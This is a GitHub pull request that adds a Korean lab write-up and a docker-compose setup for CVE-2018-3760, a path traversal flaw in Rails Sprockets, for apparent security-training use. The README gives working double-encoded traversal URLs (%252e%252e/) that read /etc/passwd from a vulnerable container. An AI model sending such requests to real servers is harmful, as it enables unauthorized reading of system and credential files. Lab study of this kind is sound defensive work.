Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[이승재/le-e-e]: rails CVE-2018-3760 분석 코드 및 결과 #27

Open
wants to merge 15 commits into
base: main
Choose a base branch
from
Open

[이승재/le-e-e]: rails CVE-2018-3760 분석 코드 및 결과 #27

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
15 commits
Select commit Hold shift + click to select a range
0206c8b
Update README.md
le-e-e Oct 18, 2023
2804cd0
Delete README.md
le-e-e Oct 18, 2023
f391130
Delete LICENSE
le-e-e Oct 18, 2023
5b0235f
Create CVE-2018-3760
le-e-e Oct 18, 2023
30f6a2a
Delete rails directory
le-e-e Oct 18, 2023
d14af7e
Create readme.md
le-e-e Oct 18, 2023
2abfbfb
Update and rename readme.md to README.md
le-e-e Oct 18, 2023
5a3167d
Update README.md
le-e-e Oct 18, 2023
4e71c50
Update README.md
le-e-e Oct 18, 2023
52200b5
Update README.md
le-e-e Oct 18, 2023
97d67f9
Update README.md
le-e-e Oct 18, 2023
be4789f
Update README.md
le-e-e Oct 18, 2023
6fe7441
Add files via upload
le-e-e Oct 18, 2023
4fde263
Update README.md
le-e-e Oct 18, 2023
84d320f
Delete nginx directory
le-e-e Oct 18, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
21 changes: 0 additions & 21 deletions LICENSE
View file
Open in desktop

This file was deleted.

7 changes: 0 additions & 7 deletions README.md
View file
Open in desktop

This file was deleted.

34 changes: 0 additions & 34 deletions nginx/CVE-2017-7529/README.md
View file
Open in desktop

This file was deleted.

28 changes: 0 additions & 28 deletions nginx/CVE-2017-7529/default.conf
View file
Open in desktop

This file was deleted.

8 changes: 0 additions & 8 deletions nginx/CVE-2017-7529/docker-compose.yml
View file
Open in desktop

This file was deleted.

28 changes: 0 additions & 28 deletions nginx/CVE-2017-7529/poc.py
View file
Open in desktop

This file was deleted.

Binary file removed nginx/CVE-2017-7529/result.png
View file
Open in desktop
Binary file not shown.
Binary file added rails/CVE-2018-3760/1.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added rails/CVE-2018-3760/2.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
30 changes: 30 additions & 0 deletions rails/CVE-2018-3760/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
# Ruby on rails 디렉토러 접근 취약점 (CVE-2018-)

##Contributors
이승재(@leeeeee)

## 요약
Ruby On Rails는 개발 환경에서 정적 파일 서버로 Sprockets를 사용하는 루비 웹 개발 프레임워크로 널리 알려져 있으며,
정적 리소스 파일을 컴파일하여 배포하는 루비 라이브러리인 Sprockets는 정적 리소스 파일을 컴파일하고 배포하는 루비 라이브러리다.

Sprockets 3.7.1 이하 버전에는 2차 디코딩으로 인한 디렉토리 접근 취약성이 있다. 공격자는 %252e%252e/를 사용하여 루트 디렉터리에 액세스하고 대상 서버의 모든 파일을 읽거나 실행할 수 있다.

참고 링크 :
- https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
- https://seclists.org/oss-sec/2018/q2/210
- https://xz.aliyun.com/t/2542

## 환성 설정
다음과 같은 명령어를 입력 :

```docker compose up -d```


## 실행
/etc/passwd 파일이 허용된 디렉토리에 없기 때문에 http://your-ip:3000/assets/file:%2f%2f/etc/passwd를 직접 방문하여 오류를 발생시킨다.
![1](https://github.com/le-e-e/whitehat-school-vulhub/assets/51049963/7ecc364c-20a7-445c-820b-27cf7e788e78)
오류 페이지별로 허용된 디렉토리 목록을 가져올 수 있다. /usr/src/blog/app/assets/images와 같은 디렉토리 중 하나를 선택한 후 %252e%252e/를 사용하여 상위 디렉토리로 이동한 후 /etc/passwd 파일을 열람한다.

```http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd```
![2](https://github.com/le-e-e/whitehat-school-vulhub/assets/51049963/055cee2b-794e-4d71-a6c8-17b7555eaeff)

6 changes: 6 additions & 0 deletions rails/CVE-2018-3760/docker-compose.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
version: '2'
services:
web:
image: vulhub/rails:5.0.7
ports:
- "3000:3000"